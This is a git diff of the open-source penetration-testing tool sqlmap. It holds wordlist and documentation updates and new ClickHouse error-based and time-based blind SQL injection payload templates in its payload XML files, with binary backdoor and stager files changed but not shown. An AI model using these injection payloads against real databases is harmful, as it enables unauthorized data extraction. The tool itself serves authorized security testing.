diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
index b7753a255..0a2d0fe4a 100644
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
If applicable, add screenshots to help explain your problem.
**Running environment:**
- - sqlmap version [e.g. 1.3.5.93#dev]
- - Installation method [e.g. git]
- - Operating system: [e.g. Microsoft Windows 10]
- - Python version [e.g. 3.5.2]
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
**Target details:**
- DBMS [e.g. Microsoft SQL Server]
diff --git a/LICENSE b/LICENSE
index a46c0da58..172de6054 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2022 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
diff --git a/README.md b/README.md
index 3ac67dbca..9cc4603d5 100644
--- a/README.md
+++ b/README.md
@@ -69,7 +69,8 @@ Translations
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
-* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
+* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
\ No newline at end of file
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
index 5a81545e0..bc912038c 100644
Binary files a/data/shell/backdoors/backdoor.asp_ and b/data/shell/backdoors/backdoor.asp_ differ
diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_
index 8e83a0d20..de889b1ed 100644
Binary files a/data/shell/backdoors/backdoor.aspx_ and b/data/shell/backdoors/backdoor.aspx_ differ
diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_
index 8d01202f0..f798ea577 100644
Binary files a/data/shell/backdoors/backdoor.jsp_ and b/data/shell/backdoors/backdoor.jsp_ differ
diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_
index 5db8f130f..720bfe1ff 100644
Binary files a/data/shell/backdoors/backdoor.php_ and b/data/shell/backdoors/backdoor.php_ differ
diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_
index 5c235ecb5..bd08896ad 100644
Binary files a/data/shell/stagers/stager.asp_ and b/data/shell/stagers/stager.asp_ differ
diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_
index f20887a96..3694b2c15 100644
Binary files a/data/shell/stagers/stager.aspx_ and b/data/shell/stagers/stager.aspx_ differ
diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_
index beec2ae56..f70ac6f9e 100644
Binary files a/data/shell/stagers/stager.jsp_ and b/data/shell/stagers/stager.jsp_ differ
diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_
index eafe62771..c5103161a 100644
Binary files a/data/shell/stagers/stager.php_ and b/data/shell/stagers/stager.php_ differ
diff --git a/data/txt/common-columns.txt b/data/txt/common-columns.txt
index f3679cf89..0dd562736 100644
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
id
@@ -1844,6 +1844,10 @@ banner_id
error
language_id
val
+parol
+familiya
+imya
+otchestvo
# site:jp
@@ -2731,6 +2735,34 @@ ssn
account
confidential
+# site:nl
+
+naam
+straat
+gemeente
+beschrijving
+id_gebruiker
+gebruiker_id
+gebruikersnaam
+wachtwoord
+telefoon
+voornaam
+achternaam
+geslacht
+huisnummer
+gemeente
+leeftijd
+
+# site:cn
+
+yonghuming
+mima
+xingming
+xingbie
+touxiang
+youxiang
+shouji
+
# Misc
u_pass
diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt
index f20610d9d..8fbbe0ebd 100644
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# CTFs
diff --git a/data/txt/common-outputs.txt b/data/txt/common-outputs.txt
index 7ac22206d..56084d914 100644
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
[Banners]
@@ -399,6 +399,7 @@ XDBWEBSERVICES
# MySQL
information_schema
+performance_schema
mysql
phpmyadmin
diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt
index 21ab6eb48..6e9125c0e 100644
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
users
@@ -3578,3 +3578,11 @@ users
user_usergroup_map
viewlevels
weblinks
+
+# site:nl
+
+gebruikers
+
+# site:cn
+
+yonghu
diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt
index b0976fde5..f8c81387c 100644
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt
index d18904fca..02f520019 100644
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Opera
diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
index f401c8004..bfd4440ba 100644
Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
index f442d1f14..1992ed034 100644
Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
index 17814b6ba..bb8ec366d 100644
Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
index 33a7adbe0..97799b69d 100644
Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
index f7e6da364..33dbdeeb3 100644
Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
index 3b030e70b..c56d76620 100644
Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
index 7c72515a8..3fb236e26 100644
Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
index 43f7cdc55..d734fff00 100644
Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
index 2c49149d0..da50fa8ea 100644
Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
index f463ee754..83732d332 100644
Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
index 147039a25..ee1ca8cce 100644
Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
index cf56372ea..ab7e74562 100644
Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
index 8ec4566eb..5314a0a38 100644
Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
index 310f838de..da9d0a7f6 100644
Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
index 504be8277..1100ab820 100644
Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
index 2e19b356e..f9396a86a 100644
Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
index ee94408ec..21bbddcf5 100644
Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
index 8a61270ca..9327b1cdb 100644
Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
index b1258cbe9..a98744494 100644
Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
index 2c2e96ca7..e4b124fc8 100644
Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
index 2db355e26..2c22afae9 100644
Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
index 1335862f7..ab23ee6a7 100644
Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
index bb2b6f195..8dae29c83 100644
Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
index c730910de..e5d05fc6f 100644
Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
index 6ddad36fa..ff31df614 100644
Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
index 0f9bdf362..d5576fdd8 100644
Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
index 0f54d5136..2350427f4 100644
Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
index a5bdf892d..eae84bdad 100644
Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
index bbe6aabf6..4a408a1ae 100644
Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
index a05e36e8c..40f838b30 100644
Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
index 7a03c0d0d..a9b4b48c7 100644
Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
index eac654286..06aee54d7 100644
Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
index 6bfd62c07..67b5d3497 100644
Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ
diff --git a/data/xml/errors.xml b/data/xml/errors.xml
index 59ae1e8e2..4993a8ae8 100644
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -211,6 +211,11 @@
+
+
+
+
+
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml
index f9505522f..9b1d2725f 100644
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -838,7 +838,7 @@
IBM DB2 OR error-based - WHERE or HAVING clause
2
4
- 1
+ 3
1
1
OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
@@ -853,6 +853,44 @@
+
+ ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 3
+ 1
+ 1,2,3,9
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 4
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
index dfd9a2d26..21a50ce40 100644
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -195,9 +195,9 @@
2
1,2,3,8,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -235,9 +235,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -276,9 +276,9 @@
2
1,2,3,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -318,9 +318,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -1494,6 +1494,44 @@
+
+ ClickHouse AND time-based blind (heavy query)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR time-based blind (heavy query)
+ 5
+ 5
+ 3
+ 1,2,3
+ 1
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
@@ -1607,10 +1645,10 @@
5
2
1,2,3,9
- 1
- IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ 3
+ IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -1880,7 +1918,7 @@
4
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
@@ -1900,7 +1938,7 @@
5
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
index deda4364d..300e70975 100644
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -938,8 +938,8 @@
-
-
+
+
@@ -962,11 +962,11 @@
-
+
-
+
@@ -975,11 +975,11 @@
-
+
-
+
@@ -1319,6 +1319,75 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
index 1281080c0..a6c344a34 100644
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,3 +1,8 @@
+# Version 1.7 (2022-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
# Version 1.6 (2022-01-03)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md
new file mode 100644
index 000000000..1adc31000
--- /dev/null
+++ b/doc/translations/README-sk-SK.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
+
+Snímky obrazovky
+----
+
+
+
+Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
+
+Inštalácia
+----
+
+Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
